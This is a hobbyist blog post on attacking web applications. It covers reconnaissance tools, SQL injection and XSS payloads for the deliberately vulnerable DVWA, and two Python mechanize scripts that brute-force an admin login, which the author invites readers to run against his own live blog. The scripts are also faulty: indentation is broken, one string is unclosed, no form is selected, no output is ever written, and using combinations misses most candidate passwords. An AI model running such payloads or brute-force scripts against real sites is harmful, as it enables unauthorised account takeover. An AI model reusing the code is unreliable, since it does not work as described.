Exploiting Web Applications

Created On 30. Apr 2020

Updated: 2021-05-01 23:44:40.875422000 +0000

Created By: acidghost

Exploiting web applications can be a lot of fun as well. Here are some simple tools that you can use to have a better idea about vulnerabilities of a web app.

whatweb gives information on a hosted app on the domain, as well on the server type, IP, and in some cases the versions of languages that support the framework.
run it like this against this blog:
# whatweb zonaincognita.com
There is some interesting, but let's check something else.
# whatweb mechaplay.com
Additionally we see the PHP and JQuery versions. And I really tried to beef it up with a lot of plugins and whatnot. Well that's WordPress for you.

is a tool for testing web application firewalls. It's built in Kali and you can launch it like this:
# wafw00f http://zonaincognita.com

this tool will help find out if a domain is using DNS or HTTP load balancing.
check this out:
# lbd www.zonaincognita.com

this tool copies a website.
Install it like this:
# sudo apt-get install httrack
then fire
# httrack "http://zonaincognita.com" -O "/tmp/httrack" -v
Careful, as this operation might consume all your memory :wink:

this tool checks the certificate details by querying the SSL services. We'll check that when SSL is properly enabled here ;)

DVWA On Metasploitable
We will check the Metasploitable system later in more detail. Meanwhile here is a short reference about its Damn Vulnerable Web App and what kind of exploits can be executed.

SQL Injection
this type of attack injects a piece of code that alters the output of a web application that's sent to the back-end. This is called tautological injection. It is one of the most frequent types of SQL injections used. An example is 1 or 0=0, which is an unconditionally true expression that if injected in a SQL table will reveal database table rows and will bypass authentication.

Cross site scripting attacks work the following ways:
1.execute scripts from text fields on a website.
For example, if the site is prone to XSS this script pasted in to the text field and executed will pop up an alert:
<script>alert("XSS Scripting")</script>
2. Defacement attacks to load a website in the text box:
<iframe src=http://www.zonaincognita.com></iframe>
3. upload a malicios script if the type of uploaded files is not screened.
4. command execution - execute scripts, or see contents of files on the target system itself.

Brute forcing this blog
There is no fun without actually trying to break something, right?
I encourage you to to try to crack the password of my blog with such as the scripts below.
We are using the mechanize python module to navigate through pages and get the words from a 'password' file with a wordlist that will iterate through 'lines'.
You can similarly go with a list of emails for the email field. Now you know better why hackers steal emails and how they are being used. On the black market you can get lists of 50K email and password combinations for less than 1$. Are you there as well? I found that there have been multiple instances of my accounts pwned. Happens to all of us.
The result will be written to a txt file and the attack number will be appended at the end of filename. Never mind the long path, that's just for fun :feelsgood:

import mechanize

url = "http://zonaincognita.com/noautomationorencryptionorwhatsoeveranywayhereisasuperlongpathforyouwhichis318bits/admin_users/sign_in"
browser = mechanize.Browser()
attackNumber = 1

with open('passwords.txt') as f:
	for lines in f:
	browser["admin_user[email]"] = 'my email here'
	browser["admin_user[password]"] = lines

	res = browser.submit()
	content = res.read()
	print res.code

	output = open('response'+str(attackNumber)+'.txt', 'w')
	attackNumber += 1

Here is the same script, but in contrast, we are letting it do the work for us, assuming the password is in ascii lowercase with a length of 8 characters:

import mechanize
from itertools import combinations
from string import ascii_lowercase

url = "http://zonaincognita.com/noautomationorencryptionorwhatsoeveranywayhereisasuperlongpathforyouwhichis318bits/admin_users/sign_in"
browser = mechanize.Browser()
attackNumber = 1

passwords = (p for p in combinations(ascii_lowercase, 8))

for p in passwords:
	browser["admin_user[email]"] = 'the email comes here
	browser["admin_user[password]"] = ''.join(p)

	res = browser.submit()
	content = res.read()

	print res.code

	output = open('response'+str(attackNumber)+'.txt', 'w')
	attackNumber += 1

On successful login you will see in the response 'Signed in successfully' otherwise 'Invalid email or password'.

Section: Web